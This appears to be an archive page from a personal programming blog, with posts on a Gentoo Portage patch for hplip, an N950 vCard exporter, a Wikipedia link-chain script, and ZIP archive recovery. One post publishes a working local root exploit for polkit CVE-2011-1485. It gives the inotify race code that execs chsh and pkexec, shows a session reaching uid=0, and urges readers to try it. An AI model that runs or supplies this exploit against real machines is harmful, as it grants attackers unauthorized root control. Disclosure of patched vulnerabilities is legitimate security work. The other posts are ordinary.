Gentoo’s HP printer driver package, net-print/hplip, installs /etc/xdg/autostart/hplip-systray.desktop when the gui USE flag is enabled, which makes an awful Windows-like tray app load in every desktop environment, for every user on the machine. Who wants this? Every user? Tray app? Autostart? This is Linux, not Windows, right?

The Gentoo devs don’t seem to want to add an autostart USE flag, and I don’t feel like maintaining my own ebuild for this, either. So, the official advice is to copy hplip-systray.desktop into ~/.config/autostart in your own home folder, and then edit the copy to contain Hidden=true. Yuck. Now my start-up routine has to spend extra CPU cycles resolving the override, not to mention that each and every user on my machine has to do this. Sure, I could add this extra file to the default set of files copied into each home folder on user creation, but do I really want to do that? What about preexisting users? Do I really want this system-installed package to require that kind of manual intervention? The obvious thing to do is just to delete /etc/xdg/autostart/hplip-systray.desktop each time hplip installs, namely, after each update.

But the official advice calls this approach “naive”. Fuck that. I don’t want the extra overhead of working out the collision, nor do I want to have to add this file to each user’s home folder. I want that file gone, dead, vamos’d. The thing is, that means I have to manually remove the file every time the ebuild gets updated (and remember, I don’t want to maintain my own fork of the ebuild).

Fortunately, there’s a solution: Portage allows per-package environment overrides via /etc/portage/env/, files that are sourced as bash into the ebuild environment. By putting some monkey-patching code in the right place, we can override a function inside all subsequent hplip ebuilds to automagically remove the ugly file. Create the right directory:

sudo mkdir -p /etc/portage/env/net-print

Then, add my monkey patch code to it:

sudo vim /etc/portage/env/net-print/hplip
if ! type -t original_src_install >/dev/null && type -t src_install >/dev/null; then
        # Save the ebuild's src_install by re-declaring its body under a new name...
        eval "$(echo 'original_src_install()'; declare -f src_install | tail -n +2)"
        # ...then wrap it with a version that deletes the autostart file afterwards
        src_install() {
                original_src_install
                rm -f "${D}"/etc/xdg/autostart/hplip-systray.desktop || die
        }
fi

Finally, re-emerge hplip, and it should install without the autostart file. Yes, this is one ugly bash-ism, but it seems to do the job. Any suggestions would be appreciated.


Update: A reader below has noted that a far superior way of doing this is to just put

INSTALL_MASK="/etc/xdg/autostart/hplip-systray.desktop $INSTALL_MASK"

inside of /etc/portage/env/net-print/hplip, with no need for the monkey patching above. INSTALL_MASK is a great feature, one that is hardly highlighted in the documentation at all. The most official mention of it I could find is in make.conf’s man page:

       INSTALL_MASK = [space delimited list of file names]
              Use this variable if you want to selectively prevent certain
              files from being copied into your file system tree. This does
              not work on symlinks, but only on actual files. Useful if you
              wish to filter out files like HACKING.gz and TODO.gz. The
              INSTALL_MASK is processed just before a package is merged. Also
              supported is a PKG_INSTALL_MASK variable that behaves exactly
              like INSTALL_MASK except that it is processed just before
              creation of a binary package.

Internally in misc-functions.sh, it does essentially the same thing as my monkey patch:

install_mask() {
	local root="$1"
	shift
	local install_mask="$*"
 
	# we don't want globbing for initial expansion, but afterwards, we do
	local shopts=$-
	set -o noglob
	for no_inst in ${install_mask}; do
		set +o noglob
		quiet_mode || einfo "Removing ${no_inst}"
		# normal stuff
		rm -Rf "${root}"/${no_inst} >&/dev/null
 
		# we also need to handle globs (*.a, *.h, etc)
		find "${root}" \( -path "${no_inst}" -or -name "${no_inst}" \) \
			-exec rm -fR {} \; >/dev/null 2>&1
	done
	# set everything back the way we found it
	set +o noglob
	set -${shopts}
}
October 31, 2011 · 6 comments


Since it’s been 6 months since it was reported, I figure a responsible amount of time has passed for me to release a local root exploit for Linux targeting polkit-1 <= 0.101, CVE-2011-1485, a race condition in PolicyKit. I present you with PolicyKit Pwnage.

David Zeuthen of Red Hat explains on the original bug report:

Briefly, the problem is that the UID for the parent process of pkexec(1) is read from /proc by stat(2)’ing /proc/PID. The problem with this is that this returns the effective uid of the process which can easily be set to 0 by invoking a setuid-root binary such as /usr/bin/chsh in the parent process of pkexec(1). Instead we are really interested in the real-user-id. While there’s a check in pkexec.c to avoid this problem (by comparing it to what we expect the uid to be – namely that of the pkexec.c process itself which is the uid of the parent process at pkexec-spawn-time), there is still a short window where an attacker can fool pkexec/polkitd into thinking that the parent process has uid 0 and is therefore authorized. It’s pretty hard to hit this window – I actually don’t know if it can be made to work in practice.

Well, here is, in fact, how it can be made to work in practice. There is, as he said, an attempted mitigation, and the way to trigger that mitigation path is something like this:

     $ sudo -u `whoami` pkexec sh
     User of caller (0) does not match our uid (1000)

Not what we want. So the trick is to execl a setuid binary at precisely the moment /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed, and execl the setuid binary as our very next instruction.

	if (fork()) {
		int fd;
		char pid_path[1024];
		sprintf(pid_path, "/proc/%i", getpid());
		printf("[+] Configuring inotify for proper pid.\n");
		close(0); close(1); close(2);
		fd = inotify_init();
		if (fd < 0)
			perror("[-] inotify_init");
		inotify_add_watch(fd, pid_path, IN_ACCESS);
		read(fd, NULL, 0);

All the code up to this point makes this process block until /proc/PID is read, at which point it:

		execl("/usr/bin/chsh", "chsh", NULL);

Which is setuid. Meanwhile, in the other process, we launch pkexec, which skirts past the initial checks but gets fooled when we change the uid of the parent process:

	} else {
		sleep(1);
		printf("[+] Launching pkexec.\n");
		execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
	}

And it works:

 $ pkexec --version
 pkexec version 0.101
 $ gcc polkit-pwnage.c -o pwnit
 $ ./pwnit 
 [+] Configuring inotify for proper pid.
 [+] Launching pkexec.
 sh-4.2# whoami
 root
 sh-4.2# id
 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 sh-4.2#

This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which as of writing uses 0.101, has backported 0.102's bug fix. A way to check is to look at the mtime of /usr/bin/pkexec -- if it's April 19, 2011 or later, you're out of luck. It's likely other distributions do the same. Fortunately, this exploit is clean enough that you can try it out without too much collateral.

So head on over and try it out! You can watch it in action over on YouTube as well:

Greets to Dan.

October 5, 2011 · 3 comments


My work for Grafitroniks was featured in an expo in Paris last week:

Viscom 2011


I built the PrintCompositor.

October 1, 2011 · 1 comment


The vCard export GUI feature of the contacts app on the N950 is broken. The console app “vcardconverter” successfully digests vCards, but you won’t be able to get them back out. In my case, it converted some back to vCards, but failed on others. Unacceptable. For updating to today’s new firmware, I didn’t want to take a full backup of the tracker database, choosing instead to start fresh, suspecting that the new firmware fixes a lot of bugs. How, then, was I to back up my contacts, if I wasn’t going to back up the tracker? vCard is the perfect neutral format for this.

So in a few lines of easy Qt/C++, I wrote vcardexport, a console application. It spits all the contacts out into one giant vcard file that can be reimported later with vcardconverter. Simple and easy. The biggest pain was getting the Aegis manifest correct, as the auto-generation tool is broken, and documentation is kind of sparse, but it’s all sorted now.

You can browse the source here or download the latest deb from here.

Usage:

$ /opt/vcardexport/bin/vcardexport > ~/vcards.vcf

Hope this is helpful. Enjoy the new firmware:

    image        [state    progress         transfer     flash speed]
---------------------------------------------------------------------
[x] cert-sw      [finished   100 %       1 /       1 kB      NA     ]
[x] cmt-2nd      [finished   100 %      95 /      95 kB      NA     ]
[x] cmt-algo     [finished   100 %     789 /     789 kB      NA     ]
[x] cmt-mcusw    [finished   100 %    6008 /    6008 kB    2933 kB/s]
[x] xloader      [finished   100 %      23 /      23 kB      NA     ]
[x] secondary    [finished   100 %      88 /      88 kB      NA     ]
[x] kernel       [finished   100 %    2708 /    2708 kB    2024 kB/s]
[x] rootfs       [finished   100 %  326205 /  326205 kB    7339 kB/s]
[x] mmc          [finished   100 %  204747 /  204747 kB   17604 kB/s]
Updating SW release
Success
September 19, 2011 · 1 comment


Ryan had a pretty funny idea I saw in his GitHub — how many clicks does it take on Wikipedia to get from any given article to the article on “Philosophy”? He started to implement it by choosing the first link on each page and following that, written in node.js with jsdom. I rewrote his script (a 97% rewrite, according to git) to instead generate a tree structure of all the links on each page and then do a breadth-first search on the tree, continually requesting new pages in parallel. It seems to be working amazingly well:

$ node wiki-philosophy.js Seinfeld
Seinfeld
        Nihilism
                Philosophy

$ node wiki-philosophy.js Superman
Superman
        Cultural icon
                Philosophy

$ node wiki-philosophy.js Burrito
Burrito
        Mexican cuisine
                Tribute
                        Philosophy
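The breadth-first strategy itself can be sketched without any of the scraping. Here is a minimal Python version over an in-memory page-to-links mapping (the real script fetches live pages with node.js and jsdom; the function name and toy graph below are my own):

```python
from collections import deque

def bfs_path(links, start, target):
    """Breadth-first search over a page -> [linked pages] mapping.
    Returns the shortest chain of pages from start to target, or None."""
    queue = deque([[start]])  # queue of paths, not just nodes
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in links.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None
```

Because the queue holds whole paths and is explored level by level, the first path that reaches the target is guaranteed to be a shortest one, which is exactly why the chains above stay so short.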

Play around with it! I’ve posted it with install instructions over in my git repository. Hopefully Ryan will pull back my changes into his repository and continue to develop this into something creative.

September 7, 2011 · (No comments)




Back in February I gave a workshop seminar on the basics of Qt — covering signals, slots, the meta-object system, QtGui, QtWebKit, and Qt Creator. We all built a fully functional web browser together over the course of about an hour. The entire thing was spoken off the top of my head, so it might be slightly disorganized, but it was received quite well. I know that following the presentation, at least two people went on to use Qt for major projects. Here’s the presentation:


Direct YouTube Link

Unfortunately, the projector in the room was broken, so we all had to huddle around my laptop, which actually had the effect of making the workshop much more intimate. If you’re interested, here’s the code we wrote together.

June 25, 2011 · (No comments)


The Nokia E52 is the most awesome phone ever made. It has a normal T9 keypad, GPS, 3G, Wifi, and runs Symbian. These are the features I need. Sure, Android and the others are more modern operating systems, but no smartphone OS has phones with T9 hardware keypads of this form factor, except for the E52. There is one problem: it’s not made anymore.

There are two models of the E52 — the E52-1, which has European 3G frequencies, and the E52-2, which has North American 3G frequencies. I’m looking for the E52-2.

If anyone knows the whereabouts of an E52-2, please inform me. I will bid high.

June 19, 2011 · 10 comments


Congratulations to the Necessitas project for joining KDE. I’m not sure what this means as far as KDE’s orientation, or how it reflects the latest attitude of, “shit! we spent all this time fussing over Nokia’s mobile hype, and now we realize the desktop is rotting and we need to save it,” but it’s nonetheless exciting to know that Necessitas is supported by a good organization.

With that said, maybe it’s time for me to find a smartphone. I still use an old Nokia 1100, which doesn’t support much more than calling and SMS. And Snake II. Windows Phone 7 is out. MeeGo is dead. WebOS is limping. Blackberry has an arcane dev environment. What does that leave? Junked-up Android. As a platform, Android already seems to be experiencing some bloat and disorganization, and Java doesn’t seem too hot. But at the very least it runs Qt now.

The big problem is finding a satisfactory phone. My criteria are fairly simple:

  • QWERTY physical keyboard (I actually would prefer T9, but this is now long past :-( ). This is very important. I will not compromise about this.
  • GSM that runs on AT&T’s 3G network, as well as general GSM support for Europe.
  • Rootable and/or rom-unlockable.
  • Sensible update policy / recent operating system.
  • Big pretty screen.
  • Fast processor.
  • Solid construction.
  • The usual assortment of GPS, Bluetooth, etc do-dads.
But nothing like this exists. Well, the Xperia Pro looks almost perfect — AT&T 3G (approximately), fast processor, pretty screen, great keyboard, etc. — except so far it’s only available for pre-order in the UK, and it’s looking unlikely it’ll be hitting the US.

What is out there that meets these criteria? Why has my research continually turned up dry?

[Sidenote: actually, the perfect phone for me might be the very dated Nokia E52, but I can't seem to find a North American model anywhere, even on eBay.]

June 2, 2011 · 43 comments


My brother is a wonderful photographer, and took 14 gigabytes of photos at my recent graduation from Columbia, some of which I hope to post on PhotoFloat — my web 2.0 photo gallery done right, via static JSON & dynamic JavaScript. He was kind enough to upload a ZIP of the RAW (Canon Raw 2 – CR2) photos to my FTP server overnight from his killer 50 Mbps pipe. The next day, he left for a long period of traveling.

I downloaded the ZIP archive, eager to start playing with the photographs, learning about RAW photos, playing with tools like dcraw, lensfun, and ufraw, and also seeing if I could forge Canon’s “Original Decision Data” tags. To my dismay, the ZIP file was corrupted. I couldn’t ask my brother to re-upload it or rsync the changes or anything like that, because he was traveling, and it was already a great burden for him to upload these in the nick of time. I tried zip -F and zip -FF and even a few Windows shareware tools. Nothing worked. So I decided to write my own tool, using nothing more than the official PKZIP spec and man pages.

First, a bit about how ZIP files are structured — everything here is based on the famous official spec in APPNOTE.TXT. ZIP files are laid out like this:

        [local file header 1]
        [file data 1]
        [data descriptor 1]
        . 
        .
        .
        [local file header n]
        [file data n]
        [data descriptor n]
        [archive decryption header] 
        [archive extra data record] 
        [central directory]
        [zip64 end of central directory record]
        [zip64 end of central directory locator] 
        [end of central directory record]
    

Generally, unzippers seek to the central directory at the end of the file, which records the locations, sizes, and names of all the files in the zip. An unzipper reads this in, then seeks back up to the top to read the files off one by one.

The strange thing about my brother’s broken file was that the beginning files would work and the end files would work, but the middle 11 gigabytes were broken, with Info-ZIP complaining about wrong offsets and lseeks. I figured that some data had been duplicated or re-uploaded at random spots in the middle, so the offsets in the zip file’s central directory were broken.

For each file, however, there is a local file header and an optional data descriptor. Each local file header starts with the same signature (0x04034b50) and contains the file name and the size of the file data that follows the header. But sometimes the size of the file is not known until the file has already been inserted into the zip, in which case the local file header reports “0” for the file size and sets bit 3 of a bit flag. This indicates that after the file data, of unknown length, there will be a data descriptor that gives the file size. But how do we know where the file ends, if we don’t know the length beforehand? Usually this data is duplicated in the central directory at the end of the zip file, but I wanted to avoid parsing that altogether. Instead, it turns out that, although the data descriptor was not originally assigned a signature, APPNOTE.TXT notes: “the value 0x08074b50 has commonly been adopted as a signature value for the data descriptor record. Implementers should be aware that ZIP files may be encountered with or without this signature marking data descriptors and should account for either case when reading ZIP files to ensure compatibility. When writing ZIP files, it is recommended to include the signature value marking the data descriptor record.” Bingo.
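To make the local file header layout concrete, here is a sketch in Python (field offsets follow APPNOTE.TXT; the function name is mine, and the actual recovery tool is written in C):

```python
import struct

# Local file header: signature, version needed, flags, compression method,
# mod time, mod date, crc-32, compressed size, uncompressed size,
# file name length, extra field length -- 30 bytes total, little-endian.
LOCAL_FILE_HEADER = struct.Struct('<IHHHHHIIIHH')

def parse_local_header(data, off):
    """Parse the local file header at `off`; return (name, flags, method,
    crc, csize, usize, data_start), or None if the signature doesn't match."""
    if data[off:off + 4] != b'PK\x03\x04':  # 0x04034b50, little-endian on disk
        return None
    (_, _, flags, method, _, _, crc, csize, usize,
     nlen, elen) = LOCAL_FILE_HEADER.unpack_from(data, off)
    name = data[off + 30:off + 30 + nlen].decode('utf-8', 'replace')
    # The file's data begins right after the name and extra field
    return name, flags, method, crc, csize, usize, off + 30 + nlen + elen
```

If bit 3 of `flags` is set, `csize` and `usize` read as zero here and the real sizes live in the trailing data descriptor, as described above.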

So the recovery algorithm works like this:

  • Look for a local file header signature integer, reading 4 bytes and rewinding 3 each time it fails.
  • Once found, see if the size is there. If the size is in it, read that much data out to the file path.
  • If the size isn’t there, search for the data descriptor signature, reading 4 bytes and rewinding 3 each time it fails.
  • When found, rewind to the start of the data segment and read the number of bytes specified in the data descriptor.
  • Rewind to 4 bytes after the local file header signature and repeat the process.
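The whole scan condenses into a short Python sketch (again, the real tool is C with packed structs; the names here are mine, and I've included the CRC-32 check even though the original skips it):

```python
import struct
import zlib

def carve_zip(data):
    """Walk raw bytes looking for local file header signatures, carve out
    each member, inflate it if deflated, and keep it only if its CRC-32
    matches. Never touches the (possibly wrecked) central directory."""
    files = {}
    off = 0
    while True:
        off = data.find(b'PK\x03\x04', off)  # local file header signature
        if off < 0 or off + 30 > len(data):
            break
        (_, _, flags, method, _, _, crc, csize, _usize,
         nlen, elen) = struct.unpack_from('<IHHHHHIIIHH', data, off)
        name = data[off + 30:off + 30 + nlen].decode('utf-8', 'replace')
        start = off + 30 + nlen + elen
        if flags & 0x8:
            # Sizes deferred: hunt for the (commonly present) data
            # descriptor signature, then take crc and csize from it.
            dd = data.find(b'PK\x07\x08', start)
            if dd < 0:
                off += 4
                continue
            crc, csize = struct.unpack_from('<II', data, dd + 4)
        payload = data[start:start + csize]
        if method == 8:  # deflated; a broken stream raises zlib.error
            try:
                payload = zlib.decompress(payload, -15)
            except zlib.error:
                off += 4
                continue
        if zlib.crc32(payload) & 0xffffffff == crc:
            files[name] = payload
        off += 4  # keep scanning past this signature
    return files
```

Because the scan only trusts what it can verify locally, junk inserted before, between, or after members just gets skipped over.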

The files may optionally be deflated, so I use zlib inline to inflate them; the advantage is that deflate streams have their own verification built in, so I don’t need to check the zip’s CRC-32 (though I should).
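In Python terms, that built-in verification is structural rather than a checksum: a raw deflate stream (wbits of -15, headerless, as stored inside zip members) that has been truncated or mangled raises an error instead of silently yielding bogus bytes. An illustration:

```python
import zlib

def deflate_raw(data):
    """Compress to a raw deflate stream, the format stored inside zip members."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15: no zlib header/trailer
    return co.compress(data) + co.flush()

def inflate_raw(blob):
    """Inflate a raw deflate stream; corruption surfaces as zlib.error."""
    return zlib.decompress(blob, -15)
```

A truncated stream fails to reach its end-of-stream marker, so `inflate_raw` errors out rather than returning partial garbage, which is why a CRC check is a belt-and-braces addition rather than strictly necessary.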

Along the way there is some additional tricky logic for making sure we’re always searching with maximum breadth.

The end result of all this was… 100% recovery of the files in the archive, complete with their full file names. Win.

You can check out the code here. Suggestions are welcome. It’s definitely a quick hack, but it did the job. It took a lot of fiddling to make it work, especially figuring out __attribute__((packed)) to turn off gcc’s struct alignment padding.

May 21, 2011 · 16 comments